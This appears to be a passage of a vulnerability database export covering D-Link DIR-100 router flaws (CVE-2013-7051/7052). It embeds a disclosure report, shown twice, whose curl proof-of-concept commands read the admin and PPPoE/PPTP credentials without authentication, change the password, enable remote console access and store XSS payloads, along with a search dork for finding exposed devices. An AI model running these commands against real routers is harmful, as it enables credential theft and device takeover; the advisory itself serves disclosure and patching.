\n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n   authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n   password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n   condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n   commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n   accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n    curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n    # and respectively when authenticated\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. 
\n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n    \n    # open the router interface in a web browser and log in\n    firefox  \u0027http://192.168.0.1/\u0027 \n    \n    # open a new terminal or another web-browser which is currently not logged\n    # in and try to access\n\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n    # this request will be authenticated and it will not be redirected to the\n    # login page. If no user is logged in, the request will be redirected to\n    # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. 
\n\n### Proof of Concept\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    # Change password\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n    # enable remote console\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. 
\n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    #  XSS in Static IP Address Tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n    # XSS in Scheduler tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system.  \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7052",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "65290",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "125041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "id": "VAR-202002-0667",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:36:11.511000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "D-Link DIR-100 cliget.cgi incorrectly restricts access to vulnerable patches",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/44082"
      },
      {
        "title": "D-Link DIR-100 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107309"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-522",
        "trust": 1.0
      },
      {
        "problemtype": "Externally accessible files or directories (CWE-552) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
      },
      {
        "trust": 2.3,
        "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
      },
      {
        "trust": 1.6,
        "url": "https://www.securityfocus.com/bid/65290"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
      },
      {
        "trust": 0.4,
        "url": "http://more.dlink.de/sicherheit/news.html#news8"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2014/feb/4"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/login.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "date": "2014-02-03T23:36:22",
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "date": "2020-02-04T14:15:11.403000",
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "date": "2020-12-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "date": "2024-11-21T02:00:14.637000",
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to insufficient protection of credentials",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0666
Vulnerability from variot

D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 contains an authentication vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) may result. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to enforce its authentication mechanism, allowing remote attackers to submit requests that execute privileged commands without being verified. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability. An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
    * Hardware Revision: D1
    * Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
    * CWE-287 Authentication Issues: CVE-2013-7051
    * CWE-255 Issues with Credential Management: CVE-2013-7052
    * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
    * CWE-79 Cross-Site Scripting: CVE-2013-7054
    * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

Table of Contents

1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline

1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

  • Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
  • Retrieve sensitive configuration parameters like the pppoe username and password without authentication [CWE-200]
  • Execute privileged commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
  • Send a formatted request to a victim, which will then execute arbitrary commands on the device (CSRF) [CWE-352]
  • Store arbitrary JavaScript code which will be executed when a victim accesses the administrator interface [CWE-79]

CVE-Numbers for these vulnerabilities has not yet been assigned.

3 Technical Description of the Vulnerabilities

3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on /cliget.cgi for unauthenticated users and /cli.cgi for authenticated requests.

list of features provided by each cgi-script can be retrieved by:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

3.1 Authentication Bypass

Description

The administrator password is not protected in any way on the device: every attacker with access to the administrator interface, which listens on port 80, can retrieve it. The request that retrieves the administrator password does not need to be authenticated.

Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

3.2 Weak Authentication

Description

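As soon as a user is logged into the administration interface, the cli CGI is unlocked and can be used without prior authentication, as the cgi-script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same. Any other client that reaches the router from that address, such as a second browser or terminal that never logged in, is therefore treated as authenticated.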

Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/'

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login

3.3 Retrieve sensitive information

Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device as well, such as the PPTP and poe username and password, the configured dyndns username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

3.4 Cross-Site Request Forgery (CSRF)

Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

Proof of Concept

Changing the password for administrator can be done when the ip-address is authenticated:

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'

# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

3.5 Cross-Site Scripting (XSS)

Description

It is possible for an authenticated user to store information on the server that is not checked on the server side for special characters, which results in persistent Cross-Site Scripting vulnerabilities. With this vulnerability the victim (administrator) will run JavaScript code in the context of the D-Link DIR-100.

XSS is possible because the input is filtered and validated only on the client side (JavaScript code); data sent directly to the CGI scripts is not checked.

Proof of Concept

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

#  XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='

# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system.
Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet port. It is recommended to upgrade the router to the newest firmware for the D-Link DIR-100; the report header lists the patched image as DIR-100_fw_revd_403b13_ALL_de_20131011.zip.

5 Timeline

2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0666",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.03b07"
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dir-100  firmware  4.03b07"
      },
      {
        "model": "dir-100 ethernet broadband router 4.03b07",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b07",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Felix Richter",
    "sources": [
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2013-7051",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2013-7051",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2014-01475",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2013-7051",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2013-7051",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
